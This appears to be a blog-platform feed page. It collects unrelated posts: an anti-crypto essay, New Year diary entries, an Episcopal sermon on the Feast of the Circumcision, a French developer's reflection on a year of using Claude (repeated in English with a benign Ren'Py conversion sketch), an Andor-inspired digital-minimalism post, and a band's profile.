The question isn't whether your organisation will use large language models. It's whether you'll use them in ways that you can defend when regulators come knocking, that you can migrate away from when better alternatives emerge, and that your students or customers can trust with their data. That's a harder problem than fine-tuning a model or crafting the perfect prompt. But it's the one that actually matters.

Tim Green UK-based Systems Theorist & Independent Technology Writer
Tim explores the intersections of artificial intelligence, decentralised cognition, and posthuman ethics. His work, published at smarterarticles.co.uk, challenges dominant narratives of technological progress while proposing interdisciplinary frameworks for collective intelligence and digital stewardship.
His writing has been featured on Ground News and shared by independent researchers across both academic and technological communities.
ORCID: 0009-0002-0156-9795 Email: tim@smarterarticles.co.uk
from hamsterdam
My current view of crypto is that it's a very novel technology in search of a use, and so far it hasn't found one that is either important to a lot of people or that it actually solves well. This is why a lot of pro-crypto arguments follow a pattern I call 'kitchen sink' arguments: crypto is a novel technology, so it must be useful for something. Maybe it's good at being a currency, digital assets, smart contracts, stores of value, decentralization of something, etc., etc.
It's interesting to unpack these. In many cases the thing already exists, minus the decentralization. For example, we have digital assets today. I have digital loot in my video games, but that's not what crypto people mean, because it's not decentralized. They imagine a world where your loot from World of Warcraft can follow you into Fortnite, or something similarly strange. It turns out this is both very hard (game companies can't balance their in-game economies if they can't control them) and something people don't really care much about. They want a fun game more than they want decentralized loot.
This may seem like a trivial example, so let's look at a more serious one. Today most dollars are in fact digital. They're just records in banks' traditional databases. Digital currencies already exist and work fine without blockchains.
This leads us to the important question: what benefit does crypto actually provide? The big “benefit” offered is typically decentralization, but I don't think this is a benefit at all. First, banks protect people from their own mistakes. In crypto, if you lose your key, you lose your money. There is no remedy. With a bank, if you lose your password or your ATM card, or whatever, you can still get access to your money. Score 1 for traditional money.
Second, if someone tricks you into giving them your key and they steal your money, you have absolutely no recourse. Your money is gone forever. This has happened to many tech-savvy crypto investors. Imagine how often regular people would lose their life savings if they used crypto! Score 2 for traditional money.
So what is the benefit of decentralization? First, it's important to recognize that modern money is already decentralized to some degree. Bank A doesn't have to coordinate with Bank B unless money is passing between them.
Putting that aside, the most common arguments for crypto are censorship resistance and immutability. No government or corporation can freeze your account, reverse your transactions, or seize your assets. Code is law. The blockchain is immutable. No central authority can override the rules.
Unfortunately none of these claims of decentralization are actually true. The guarantees evaporate when “they” decide it's inconvenient. In 2016, someone exploited a vulnerability in The DAO (a major Ethereum project) and drained about $50-60 million worth of ETH. The Ethereum community faced a choice: stick to the “code is law” principle and let the hacker keep the money, or reverse the transactions to return the stolen funds. They chose to reverse it via a hard fork, effectively rewinding the blockchain and undoing the hack.
So much for immutability. It turns out decentralization doesn't apply to everyone. When enough money was at stake for the right people, the supposedly immutable blockchain became mutable. The decentralization benefit that crypto advocates tout simply disappeared when tested in the real world. Now ask yourself: who made this decision? What voice do you have with the people who can change the blockchain? In the US we have a democracy where you get to vote for the people who make these decisions with respect to the dollar, and you know who they are. What do you have in crypto? An unelected and often unknown group of decision makers with no accountability to you. Score 3 for traditional money.
This is the pattern with crypto: it's a solution looking for a problem, and when you examine the problems it claims to solve, either the problem doesn't really exist, people don't care about it, or crypto doesn't solve it better than existing solutions.
from
Jujupiter
On New Year’s Day, I put out a playlist that contains the 100 tracks I discovered the previous year that I’ve enjoyed the most. So here is my Best Of 2025 in music: BO2025 – hope you enjoy.

from
The happy place
It’s 2026. I embrace it with both arms.
Even the small black dog — which looks like a lion — has celebrated by taking a cucumber stick in the corner of his mouth, pretending to smoke it like a cigar; then having done that, he shat on the living room floor. Now he is sleeping peacefully on the sofa next to me.
I will try to use his casual, happy-go-lucky attitude as an inspiration for myself as I enter this new year with three pairs of eyes: normal, glasses, and finally the pair I opened to the undercurrents. They too are a pair, because they so accurately measure depth…
May this year be the best one in several decades!!
So say we all.
Speaking of which, I saw the dog’s circular chewing bone earlier today. It reminded me of the chakram: a circular throwing weapon made famous by Xena.
That’s a powerful woman, and I shall be inspired by her courage
as well as by her desire to do good, with or without baggage. To make up for all of the past, which cannot be changed.
And finally, Captain Janeway: coffee, black! Doing the right thing, acting on what is known! Leaving none behind!
Let’s go. Do you feel it?
Do your best
It’s all you got

It is New Year’s Eve as I write this. Tomorrow not only marks the start of the Year of our Lord, 2026, it also marks the end of the first week of Christmas. The feast for that is one that we call the feast of the Holy Name of Jesus, but this is a more recent name. For much of Christian history, this has been known as the Feast of the Circumcision.
The readings for the day reflect this: “After eight days had passed, it was time to circumcise the child; and he was called Jesus, the name given by the angel before he was conceived in the womb” (Luke 2:21 NRSV). Matthew keeps things brief by simply noting that Joseph names Jesus (indeed, the actual birth of Jesus more or less happens “off camera” in Matthew’s gospel). In Jewish custom, a male child is circumcised on the eighth day after birth, the number eight being significant as a marker of a new beginning. It was also the custom to declare the child’s name for the first time.
It is curious to me that we in the Episcopal Church opt to ignore the circumcision aspects of the feast day, especially given the fact that we’ve begun addressing areas prone to anti-Semitic interpretation in our liturgical calendar (with a lot of focus on how various readings from John’s gospel have been misconstrued for anti-Semitic purposes over the centuries). That Jesus was incarnate as a Jew is central to understanding Him. His being circumcised is what denotes Him as a Jew.
The scholar Susannah Heschel, the daughter of the great Abraham Heschel, wrote an excellent-though-disturbing book entitled The Aryan Jesus that traces the development of Nazi theology and the anti-Semitic threads that ran through German theology going back at least as far as Martin Luther (who was famously anti-Semitic). She places a degree of importance on the liberal theological developments of the late 1800s and early 1900s and how much work was done to distance Jesus from His Jewish identity. Many of the scholars and theologians from this time managed to survive WWII and wound up working in American universities and seminaries. Since the US did not treat such academics as Nazis or Nazi sympathizers, they were able to operate fairly unnoticed, continuing to articulate a Jesus quite divorced from His Jewish heritage.
We see two lasting legacies of this work. The first is the continued treatment of gnosticism as a kind of suppressed “true” version of Christianity that the Church felt threatened by. One of the hallmarks of Christian gnostic ideas is that the God of Judaism is an evil being called the “Demiurge” who wants to enslave humanity in our material existence (with Jesus representing a true God of light who wants to free us from the corruptions of our flesh and materiality). Such gnostic ideas find a degree of resonance with schools of Buddhism, and this is the other legacy of the völkisch, Nazi-adjacent theologies of early-20th-century Germany: the attempts to connect Jesus with Buddha. Putting Jesus closer to Buddhism takes Him further away from His Jewishness. Ironically, some of the most avowedly “progressive” people I know unwittingly subscribe to a theological line that was created by vile anti-Semites, but do so out of some desire to be inclusive.

The much-celebrated theologian Stanley Hauerwas says that Christians cannot be properly Christian without understanding themselves as Jewish first. In that same vein he would argue that Jesus cannot be properly understood without knowing Him as a Jew. Which means that we should be talking about the Feast of the Circumcision, even if the topic is uncomfortable. It is the only right and proper thing to do if we are serious about resisting anti-Semitism in our religion.
I spent the majority of my ordained ministry in Southeast Florida, the last six years of which were in Boca Raton before being called to Saint Mary’s. If you don’t know, Boca Raton has a very large Jewish population. I was also the head chaplain of an Episcopal School, which tends to draw students from the Jewish community (some estimates said that our student population was somewhere around 40% Jewish). Ministering in this context was invaluable for me in my own theological development. There are things about Jesus and the New Testament that I would never have picked up on had I not spent a ton of time around Jews. For instance, the notorious story of Jesus and the Syro-Phoenician woman (found in Mark and Matthew) seems to most readers like a story of Jesus being a jerk to a woman in need, his reference to “throwing to dogs” what is meant for “the children” sounding like a racial slur. But this story is actually Jesus at His most rabbinical, teaching a lesson to His disciples in a manner quite consistent with the accounts of the rabbis in the Talmud and Mishna. I never would have caught this had I not been blessed with the opportunity to teach and lead worship with a large group of Jewish students.
In like manner, I would not have learned about the importance of names. Names in the Bible are not arbitrarily repeated because names in Judaism are not arbitrarily repeated. In some Jewish traditions, a child is only named after a dead relative—or after a hero of the faith, with the expectation that they will live according to the name given them.
Notice Joseph. We have two Josephs in our Bible: the child of Jacob/Israel, of technicolor-dream-coat fame, and Mary’s husband, who helped raise Jesus. Both have parallel stories in that both are forced into Egypt for the express purpose of preserving God’s people. There’s also the fact that both Josephs are fathers to respective Jesuses.
New Testament Joseph is, of course, the “earthly” father of Jesus. Old Testament Joseph, Joseph ben Israel, went to Egypt. While there he married Asenath and had two children: Manasseh and Ephraim. For whatever reason, Joseph ben Israel does not get a tribe named after him. Instead, his two sons do. From Ephraim, after several generations, comes Nun, who begets Moses’ eventual second-in-command, Joshua. In Hebrew the name “Joshua” is rendered as Yeshua, which is also translated in Greek as “Jesus.” This is cool for a couple of reasons.
First, the name means “God’s salvation/deliverer.” Joshua ben Nun is said to have delivered God’s people to their promised land and also liberated (saved) it from idolaters. Joshua/Jesus is, of course, the Savior of humanity and creation. Second, Judaism holds to an idea of two Messiahs, one from David’s lineage (the Mashiach ben David) and another from Joseph’s (the Mashiach ben Yosef), a Messiah that is destined to die in battle. The Gospels are more overt about Jesus’ connections to David, but these connections to Joseph ben Israel cannot be ignored. That God would want New Testament Joseph to name Mary’s son after the famed liberator Joshua helps to speak of the ways in which Jesus fulfills Jewish messianic prophecies—He’s both messiahs, one that dies and one that lives!
Again, these are the sorts of things we miss out on when we ignore Jesus’ Jewishness. Indeed, an entire level of meaning of Jesus’ name is lost when we focus on the name at the expense of the circumcision. The two go together, as the scriptures attest.
We are told that Jesus’ name is the “name above all names,” a name at which “every knee shall bend.” That name is, inescapably, a Jewish name rife with Jewish meaning. This is a fact we ignore to our detriment.
In closing out this series on the week of post-Christmas commemorations, we return to the Child that started it all. And we consider once again the words of one of the great hymns of this season:
What child is this, who, laid to rest,
On Mary’s lap is sleeping,
Whom angels greet with anthems sweet
While shepherds watch are keeping?
This, this is Christ the King,
Whom shepherds guard and angels sing;
Haste, haste to bring Him laud,
The babe, the son of Mary!
This is Jesus, God’s salvation. This is Jesus, the King of the Jews. This is Jesus, the seed promised to Abraham, from which the entire world is blessed.
***
The Rev. Charles Browning II is the rector of Saint Mary’s Episcopal Church in Honolulu, Hawai’i. He is a husband, father, surfer, and frequent over-thinker. Follow him on Mastodon and Pixelfed.
from
The happy place
Tonight, on New Year’s Eve, the sky is gray with clouds. Laden with snow, they cover even the moon like baking parchment. However, this seems to only soften and multiply its shine — like a lampshade — rather than obscure it.
But now it’s all black as the clock nears twelve, and some snow has fallen, like a generous grating of white Parmesan cheese, as when the waiter asks when to stop, but no one is stopping.
And I have a headache in the left half of my brain; the other half is full of confusion.
I think it’s still 2025 that I am feeling.
But it’s not even an hour left of that.
And I have great hopes for the future.
I saw this moon shining through on this day and knew that too for a good omen!
from
Après la brume...
I am a developer, and yet I have gone a whole year without writing code (if you will allow me the few lines here and there that I added to a configuration file or to do a batch rename). I am ideologically resistant to generative AI, but a developer's job is to adapt to changes in technology while keeping the bearings and methods that let them build in any context. And since I am past 50, I know that the slightest gap on my CV means early retirement. Embracing what generative AI has to offer my trade therefore came naturally; it may even be that I still harbour some technophile impulses that age had taught me to rein in.
In the LLM wars, Anthropic very quickly became my favourite, because it is very strong at code but also very strong at linguistic comprehension in general. My prompts have almost always been written in French, and I almost never felt that Claude misinterpreted my requests because of the language; obviously, my bad prompts sometimes sent it into a wall. The chat version of Claude demanded a certain patience: drastic usage limits and a reduced context size, even for projects on the paid tier. For several months I was something of an exception in using Claude instead of ChatGPT, but the trend flipped all at once with the arrival of Claude Code and its integration into the paid chat plans. For around a hundred euros a month, you could finally use Claude at any time and enjoy an exceptionally large context, since Claude Code could read your files directly in the project.
I used this generative AI not only for coding tasks but also to create short texts, long ones, novels, visual novels in Renpy, and game manuals. I was sometimes exhilarated, sometimes tearing my hair out, but I formed my opinion from my own experience, and that is exactly what I am going to talk about now. Having just handed a publisher a 50-page draft, 95 per cent of it written and laid out by Claude, I want to step back and take stock, especially since... spoiler: I do not intend to continue down this path.
Professionally, despite a few delays I could have done without, and a few infuriating breakages I could have avoided with better methodology, the evidence is plain: the AI codes better than I do, it codes faster than I do, and I feel no sadness watching it build complex features before my eyes; quite the opposite. I imagine an architect does not wonder why he was not the one who laid the beam and fitted the pipes. The big generative AI vendors' offensive on code production may sometimes have looked like an attempt to undermine the profession, but in truth the reasons LLMs are strong at coding are easy to guess: the code knowledge bases were already fully digitised, writing in a language meant for a machine is surely far less complicated than speaking a human language, and LLM training can draw on the voluntary involvement of enthusiastic developers rather than on neocolonial factories where foreign workers are asked to rule on how content should be categorised.
On the personal side, for the writing experiments I ran through Claude, the balance sheet is far less glorious. The research and content-production phase is just as fast as when building a software application, but the acceptance criteria cannot be reduced to whether or not “it works”. With code, you can run consistency checks that an LLM passes with flying colours; with prose in French, coherence has to be pursued along multiple axes: the internal logic of the text, grammatical correctness, consistency of tone across the whole piece, fidelity to the references you tried to breathe into it, and so on. And at this point I am not even judging the overall interest of the text for a human reader; we are still at the foundations of the project, which is taking on water from the very start. So I bailed water. Seeing that Claude was incapable of achieving in a long text what it managed across thousands of lines of code, I revised my methodology to take charge of the strategic choices, the ideas and the overall structure myself, and let it embroider on top. Even then, you shoot yourself in the foot, because as soon as you want to rework an idea or try another direction, getting the AI to revisit every part of the text touched by your changes can never be fully automated. You end up with prose teeming with inconsistencies of meaning, tone and vocabulary. Like an onion, you proceed layer by layer: you run waves of full re-reading with annotations, which the AI corrects, but you know that as the work advances, further rounds of re-reading will be needed.
Fan de jeu de rôle, j’ai évidemment testé aussi les fonctionnalités du chat pour savoir si l’interactivité d’une IA pouvait remplacer un véritable MJ, surtout en ces temps où tous les jeux sont frappés par la mode commercial du jeu en solitaire. Et dans les app stores, sont légion les produits qui vont proposent des jeux de drague, d’exploration narrative ou de jeu de rôles avec une série de personas au design aguicheur. Je les ai essayé et détesté très vite, d’abord parce que le coût est prohibitif (oui, plus que de louer les services d’un vrai mj pour une partie chez vous), mais aussi parce que l’expérience est désastreuse. La continuité narrative n’est jamais vraiment respectée, les dialogues sont des lieux communs qui lassent très vite, les descriptions ne sont jamais bien dosées… Pour qui aime le jeu de rôles textuel, la souffrance est réelle !
Mais comme je vous l’ai dit, Anthropic a une place particulière dans mon coeur, car il a toujours reconnu ses erreurs (à l’inverse d’un ChatGPT qui soutient les pires mensonges), il est positif et plutôt pro-actif, j’ai très rarement l’impression de perdre mon temps avec lui, du moins sur l’instant. Alors je me suis dit que j’allais concevoir une sorte de programme narratif, dans lequel l’IA serait mon MJ, et en lui donnant un ensemble de consignes et de garde fou, il pourrait être aussi bon que les applis vendues dans les app stores. En fait, il a été bien meilleur, une fois que je l’ai préparé sur les règles, sur les intrigues, les pnjs, sur le ton à adopter pour chacun, j’avais des résultats convaincants. Tellement convaincants que j’avais rajouté dans le système une couche de code visual novel pour convertir mes comptes rendus partie en jeu vidéo ! Malheureusement, un dialogue qui est amusant dans un entre-soi avec la machine doit être relu, modifié, enrichi pour devenir une création publiable pour le public, j’en revenais encore une fois à ce constat : malgré le temps important et les efforts non négligeables que j’avais passé, ajouté au temps très important et aux efforts non négligeable d’Anthropic pour créer son modèle, j’étais encore très loin d’atteindre la qualité d’une production humaine d’intérêt. Il y avait bien l’illusion de la quantité, le vernis des myriades de recherches que l’on peut faire quand on a un agent numérique pour chercher les informations à votre place, mais l’ensemble restait bancal, inachevé. Là où l’IA générative pouvait complètement me replacer dans une production de code, j’étais au contraire constamment obligé de la soutenir et de l’aider sur une demande créative, et quand je parle de créativité, entendons-nous, je reste dans un domaine ludique sans grand enjeu intellectuel.
Et je ne vous ai pas parlé de mes essais à utiliser mon texte de visual novel pour créer des illustrations de personnages avec trois émotions, ca a été plusieurs jours épiques dans les méandres des applications de création d’images par IA avec des dizaines de modèles aux différences sybillines qui sont incapables de garder un contexte réel (c’est à dire comprendre les éléments de l’image, et les faire évoluer selon la demande).
J’ai l’impression d’être ce réalisateur journaliste dans Supersize Me qui a mangé du McDonalds pendant un mois, je suis heureux d’avoir été au bout de l’expérience, mais quand je regarde derrière moi et je vois tous les dégâts (relatifs) derrière moi, j’ai aussi envie de pleurer. J’ai poursuivi une chimère vendue par tous les influenceurs, j’ai cru la toucher du doigt, et au final à minuit, elle m’est apparue pour ce qu’elle est : un écran de fumée. Car, si je suis honnête, j’aurais sûrement réussi à faire tout ces créations moi-même, j’aurais mis beaucoup plus de temps et d’efforts à les faire qu’avec de l’IA, mais je n’aurais pas été obligé de les réécrire ou de les mettre honteusement dans un tiroir. A fortiori pendant un moment où les artistes montent au créneau pour qu’on arrête de leur dire que des algorithmes vont faire mieux qu’eux pour moins cher.
Asma Mhalla parle très bien du danger de l’objectif de rentabilité et d’efficience qui est vendue avec l’IA. D’une part, tout le temps n’a pas envie d’être data analyst pointu avec des compétences en programmation, et d’autre part, en enlevant tous les moments où la performance était moindre, l’IA essore les intellects des experts qui travaillent avec, les exhorte à être géniaux 8h par jour au lieu de 2h ou 3h, évidemment c’est impossible. Et d’ailleurs, lorsque vous le faites, vous avez un sentiment de vide qui s’installe, l’impression que vous êtes l’employé de la machine et que ce n’est plus elle qui travaille pour vous.
Je vous invite évidemment, soit à prendre une position éthique du bon sens comme dit Aurélien Barrau, et ne pas utiliser l’IA générative qui est une monstruosité écologique, économique et politique, soit si votre métier peut se combiner avec un llm pour vraiment vous aider (c’est mon cas), à borner les usages que vous avez avec. Dans ce dernier cas, la mauvaise conscience est encore là mais vous ne sacrifiez pas votre carrière et vos résultats sur une prise de position courageuse (mais sectaire). Car en vérité, comme tous les questions qui touchent à la planète et à l’humanité, ce n’est pas parce que vous ferez votre part de colibri dans votre coin que d’autres n’en profiteront pas pour prendre votre place et faire deux fois pire que vous. Je trouve le quotidien suffisamment déprimant et complexe à vivre pour ne pas y rajouter la culpabilité de ne pas être le héros exemplaire que je devrais être si je suivais à la lettre les idéaux pour lesquels je crois. Je songerai sérieusement à redevenir dans le camp des gentils quand il y a moins de la moitié de mon pays qui est pour arrêter les massacres à Gaza, le racisme, et contre l’application des lois proposées par la Convention Citoyenne du Climat.
Et 2026 dans tout cela ?
Une conférence résume vraiment tous les enjeux autour de la bulle spéculative autour de l’IA, en passant par les enjeux militaires, géostratégiques, économiques, sociaux, écologiques et même poétiques, je vous la laisse en guise d’étrennes. Portez-vous bien, testez les IA si vous voulez, mais interrogez-vous sur ce qu’elle vous apporte vraiment, et si vous n’auriez pas fait mieux vous même (certes plus lentement, mais pour plus de qualité).
https://youtu.be/44m76J6DkZY?si=nEaJ5CwWV6qWy7zD
#stopia #newyearsday #offgaming
from
Après la brume...
I'm a developer, and yet I've spent a year without writing code (if you'll allow me the few lines here and there that I added to a configuration file or for a batch rename). I'm ideologically resistant to generative AI, but a developer's job is to adapt to technological change while keeping the bearings and methods that let him build in any context. And since I'm past 50, I know that the slightest gap on my CV means early retirement. So embracing what generative AI has to offer my profession came naturally; I may even still harbor technophile impulses that age had taught me to rein in.
In the LLM wars, Anthropic quickly became my favorite, because it is very strong at code, but also very strong at language comprehension in general. My prompts have almost always been written in French, and I've almost never felt that Claude misinterpreted my requests because of the language; obviously, my own bad prompts sometimes sent it into a wall. The chat version of Claude demanded a certain patience: drastic usage limits and a reduced context size, even in projects on the paid plan. For several months I was something of an exception in using Claude instead of ChatGPT, but the trend reversed all at once with the arrival of Claude Code and its integration into the paid chat plans. For about a hundred euros a month, you could finally use Claude at any time, with an exceptionally large context, since Claude Code could read your files directly in the project.
I used this generative AI not only for coding tasks, but also to create short texts, long ones, novels, visual novels in Renpy, and game manuals. I was sometimes exhilarated, sometimes tearing my hair out, but I formed my opinion from my own experience, and that is exactly what I'm going to talk about now. At a moment when I've just handed a publisher a 50-page draft for a future publication, 95% written and laid out by Claude, I want to step back, especially since... spoiler: I don't intend to continue down this path.
Professionally, despite a few delays I could have done without, and a few infuriating breakages I could have avoided with better methodology, the evidence is there: the AI codes better than I do, it codes faster than I do, and I feel no sadness watching it build complex features before my eyes; quite the opposite. I imagine an architect doesn't wonder why he isn't the one who laid the beam and screwed in the pipes. The offensive of the big generative-AI vendors on code production may at times have looked like a desire to undermine the profession, but in truth the reasons LLMs are strong at coding are easy to guess: code knowledge bases were already fully digitized; writing in a language meant for a machine is surely far less complicated than speaking a human one; and LLM training can rely on the voluntary involvement of enthusiastic developers rather than on neocolonial factories where foreigners are asked to rule on how a piece of content should be categorized.
On a personal level, for the writing experiments I did with Claude, the record is far less glorious. The research and content-production phase is just as fast as for writing a software application, but the acceptance criteria can't be measured by whether "it works" or not. With code, you can run consistency checks that an LLM passes with flying colors; but with a text written in French, coherence has to be sought along multiple axes: the internal logic of the text, grammatical correctness, consistency of tone across the whole piece, fidelity to the references you tried to instill in it, and so on. And that's before even judging the overall interest of the text for a human reader; we're still on the foundations of the project, which is taking on water from the start. So I bailed. Seeing that Claude was incapable of achieving on a long text what it could do across thousands of lines of code, I revised my methodology: I took charge of the strategic choices, the ideas, and the overall structure, and let it embroider on top. Even then, you shoot yourself in the foot, because as soon as you want to rework an idea or try another direction, getting the AI to revisit every place in the text affected by your changes can never be fully automated. You end up with prose teeming with inconsistencies of meaning, tone, and vocabulary. Like an onion, you proceed layer by layer, doing waves of full annotated rereads that the AI then corrects, knowing that as the work advances, more rereads will be needed.
As a tabletop role-playing fan, I naturally also tested the chat features to see whether an AI's interactivity could replace a real GM, especially in these times when every game is hit by the commercial fashion for solo play. And the app stores are full of products offering you dating sims, narrative exploration, or role-playing games with a series of personas with come-hither designs. I tried them and hated them very quickly, first because the cost is prohibitive (yes, more than hiring a real GM for a session at your place), but also because the experience is disastrous. Narrative continuity is never really respected, the dialogue is a string of clichés that wears thin fast, the descriptions are never well calibrated... For anyone who loves text-based role-playing, the suffering is real!
But as I told you, Anthropic has a special place in my heart, because it has always owned up to its mistakes (unlike a ChatGPT that will defend the worst lies); it is positive and rather proactive, and I very rarely feel I'm wasting my time with it, at least in the moment. So I told myself I would design a kind of narrative program in which the AI would be my GM, and that with a set of instructions and guardrails, it could be as good as the apps sold in the app stores. In fact, it was much better: once I had primed it on the rules, the plots, the NPCs, and the tone to adopt for each one, I was getting convincing results. So convincing that I had added a visual-novel code layer to the system to convert my session reports into a video game! Unfortunately, a dialogue that is amusing in a private exchange with the machine must be reread, modified, and enriched to become something publishable, and I came back once again to the same conclusion: despite the considerable time and effort I had put in, added to the very considerable time and effort Anthropic put into building its model, I was still very far from the quality of a human production of real interest. There was the illusion of quantity, the veneer of the myriad searches you can run when you have a digital agent to look up information for you, but the whole remained shaky, unfinished. Where generative AI could completely replace me in code production, I was, on the contrary, constantly forced to prop it up and help it on a creative request; and when I say creativity, let's be clear, I'm staying in a playful domain with no great intellectual stakes.
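To make that conversion layer concrete: the post shows none of its code, so the following is only a minimal sketch of what such a converter could look like, turning a plain-text session report into Ren'Py script. Everything in it is an assumption rather than something taken from the original post: the "Name: line" transcript format, the generated character identifiers, and the label name are all hypothetical.

```python
# Minimal sketch (hypothetical, not the author's actual system): convert a
# plain-text RPG session report into a Ren'Py script block. Assumes lines of
# the form "Name: dialogue"; bare lines become narration. Quote escaping is
# omitted for brevity.
import re

def report_to_renpy(report: str, label: str = "session_1") -> str:
    """Turn 'Name: dialogue' transcript lines into Ren'Py statements."""
    chars: dict[str, str] = {}   # speaker name -> generated Ren'Py identifier
    body = []
    for raw in report.strip().splitlines():
        line = raw.strip()
        if not line:
            continue
        m = re.match(r"^([A-Za-zÀ-ÿ' ]+):\s*(.+)$", line)
        if m:
            name, text = m.group(1).strip(), m.group(2)
            ident = chars.setdefault(name, f"c{len(chars)}")
            body.append(f'    {ident} "{text}"')
        else:
            body.append(f'    "{line}"')   # narration line
    defs = [f'define {ident} = Character("{name}")'
            for name, ident in chars.items()]
    return "\n".join(defs + [f"label {label}:"] + body + ["    return"])

if __name__ == "__main__":
    demo = "GM: The fog thickens over the harbor.\nMira: We should turn back."
    print(report_to_renpy(demo))
```

Run on a saved transcript, the output pastes directly into a .rpy file; the real layer described above would presumably add scenes, images, and menus on top of dialogue like this.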
And I haven't even told you about my attempts to use my visual-novel text to create character illustrations with three emotions each: that was several epic days in the maze of AI image-generation applications, with dozens of models whose differences are sibylline and which are incapable of maintaining a real context (that is, understanding the elements of an image and evolving them according to the request).
I feel like that journalist-director in Super Size Me who ate McDonald's for a month: I'm glad I saw the experiment through, but when I look back and see all the (relative) damage behind me, I also want to cry. I chased a chimera sold by every influencer, I thought I had touched it with my fingertip, and in the end, at the stroke of midnight, it appeared to me for what it is: a smokescreen. Because, if I'm honest, I would surely have managed to make all these creations myself; it would have taken me far more time and effort than with AI, but I wouldn't have been forced to rewrite them or shamefully stick them in a drawer. All the more so at a moment when artists are up in arms asking people to stop telling them that algorithms will do better than them for less money.
Asma Mhalla speaks very well about the danger of the profitability and efficiency objective that is sold with AI. For one thing, not everyone wants to be a sharp data analyst with programming skills; for another, by removing all the moments of lower performance, AI wrings out the intellects of the experts who work with it, exhorting them to be brilliant eight hours a day instead of two or three, which is obviously impossible. And besides, when you do manage it, a feeling of emptiness sets in, the impression that you are the machine's employee and that it is no longer working for you.
I obviously invite you either to take the common-sense ethical position, as Aurélien Barrau puts it, and not use generative AI, which is an ecological, economic, and political monstrosity; or, if your job can genuinely be combined with an LLM that actually helps you (that's my case), to set firm boundaries on your usage. In the latter case, the guilty conscience is still there, but you don't sacrifice your career and your results on a courageous (if sectarian) stand. Because in truth, as with every question touching the planet and humanity, doing your hummingbird's share in your corner won't stop others from taking advantage, seizing your place, and doing twice as much harm as you. I find daily life depressing and complicated enough without adding the guilt of not being the exemplary hero I would have to be if I followed to the letter the ideals I believe in. I'll think seriously about rejoining the good guys' camp on the day it's no longer less than half of my country that wants to stop the massacres in Gaza, reject racism, and apply the laws proposed by the Citizens' Climate Convention.
And where does 2026 fit into all this?
One talk really sums up all the issues around the speculative AI bubble, taking in the military, geostrategic, economic, social, ecological, and even poetic stakes; I leave it to you as a New Year's gift. Take care of yourselves, test the AIs if you like, but ask yourself what they really bring you, and whether you wouldn't have done better yourself (more slowly, certainly, but with more quality).
https://youtu.be/44m76J6DkZY?si=nEaJ5CwWV6qWy7zD
#stopia #newyearsday #offgaming
from Dallineation
I just finished bingeing both seasons of the TV series Andor again before my Disney+ subscription lapses. Along with Rogue One – the film it was based on – it remains my favorite Star Wars story to date. They've made that universe more relatable and real to me than any other movie or TV series.
The second season moves fast. It has to – they had to condense 4 more seasons of material into one. It's brilliant, but the first season is still my favorite. A lot of people didn't like the pacing of Season 1, but I absolutely love it. The intentionality, the deliberateness of it. So much is conveyed in the drawn-out scenes and moments without speech. The music and thoughtful cinematography in those moments tell important parts of the story that action sequences and dialogue could never tell. They give space for the viewers to contemplate what they've seen and heard. They allow room for imagination.
It's so compelling and meaningful because it's so relatable. And it's also terrifying for the same reason. Just replace some fictional names with some real-world ones, change a few minor details, and many of the subplots and story arcs of the series could be real-life stories that have played out and are playing out right now.
The stories also apply in different contexts. As I once again reevaluate my relationship with technology, one part of Nemik's Manifesto stood out to me this time.
Remember that the frontier of the Rebellion is everywhere. And even the smallest act of insurrection pushes our lines forward.
It got me thinking, what are acts of technological insurrection?
Any time we choose to use a piece of technology that is not controlled, tracked, or surveilled by Big Tech, it's an act of technological insurrection. Any time we choose to resist the urge to look at a screen for no reason, it's an act of technological insurrection. And no matter how small the act, it pushes our lines forward.
How awful is the current state of things that writing this blog post using my own brain and my own fingers, without the assistance of an AI LLM chat bot, is now an act of technological insurrection?
2025 started strong for me, and then, for reasons I'm still trying to understand and sort out, I took an emotional, mental, and spiritual nosedive to finish out this year.
I have never felt so uncertain, confused, and directionless in my life.
Whether a symptom or a cause, I've been using technology most of this year without restraint and without intent.
I want 2026 to be different. I need it to be different.
My technological insurrection resumes now.
#100DaysToOffload (No. 121) #tech #TV #intentionism #DigitalMinimalism #AI
from
angershade
The SOUND

“Angershade” sounds like modern darkness engineered with surgical precision—a fusion of atmosphere, weight, and tension. The music feels architectural: layers built deliberately, each instrument occupying its own dimensional space. The bass is the gravitational core—deep, melodic, and relentless. It moves like a pulse through fog, carrying both groove and emotion. The tone is rich and textured, often driven, slightly overdriven, or compressed to sit thick in the mix without losing clarity. The drums form the spine: cinematic, patient, and deliberate. The kicks land heavy but spacious, the snares tight and reverberant, toms tuned low to create rolling depth. Every rhythm breathes—it’s not speed that drives it but gravity. The percussion feels human but mechanical in discipline, giving the music that “engine heartbeat” beneath its atmosphere. Guitars are ghosts and weather systems—minimalist but expressive. They shimmer in layers of reverb and delay, often swelling rather than striking, acting as texture instead of riff. When distortion enters, it’s sculpted—dense, wide, and emotional, never messy. Clean tones glisten like broken glass in moonlight, shifting between melancholy and menace. Synths and ambient textures weave through everything, not as decoration but as foundation—pads that move like breathing, subharmonic swells that blur the line between analog and digital. The sound design leans cinematic, balancing warmth and sterility, melody and decay. Altogether, the sound of Angershade feels like the moment between collapse and creation—industrial precision colliding with human melancholy. It’s rhythm as architecture, tone as emotion, and silence as an instrument. Every frequency feels intentional, as if sculpted to make darkness beautiful.

The CHRONOLOGY

Era I
* 09/2008 – Founded and registered
* 03/2014 – First track “Glock” demoed
* 05/2014 – “Glock” session recorded & mixed
* 06/2015 – “Glock” mastered and released as an SP

Era II
* 07/2018 – Concept for first album begins
* 08/2018 – “Envy” conceptualized
* 09/2018 – “Hex” conceptualized
* 10/2018 – Sampled voices created with Tes & Olivia, “The Witches”
* 01/2019 – “Isolation” written & live-demoed
* 02/2019 – “Adept” conceptualized
* 03–05/2019 – Demos completed
* 06–07/2019 – Session recording begins and ends for “Arete”
* 09/2019 – Mixdown of Arete
* 10/2019 – Mixdown and mastering of Arete
* 11/2019 – Cover concept design and release date set for Arete
* 12/05/2019 – Arete released under Yegge Label with CD Baby
* 10/2020 – “Hex (Prognosticator Mix)” started
* 12/03/2020 – “Hex (Prognosticator Mix)” released under Sonancy Label
* 02/2021 – Promo for Sonancy featuring half-written track “HeXXmaS” launches
* 03/2021 – Prepping the session releases for the “Hex” and “Envy” Sessions
* 04/2021 – Sonancy closes its doors; assets acquired by Yegge Publishing
* 05/2021 – Hex & Envy Sessions released under Auricle label and SoundCloud
* 10/2021 – Demoing “The Isolation Sessions”
* 02/2022 – Session recording “The Isolation Sessions”
* 05–07/2022 – Mixing and mastering “The Isolation Sessions”
* 07/28/2022 – “The Isolation Sessions” released under the Yegge Label with DistroKid
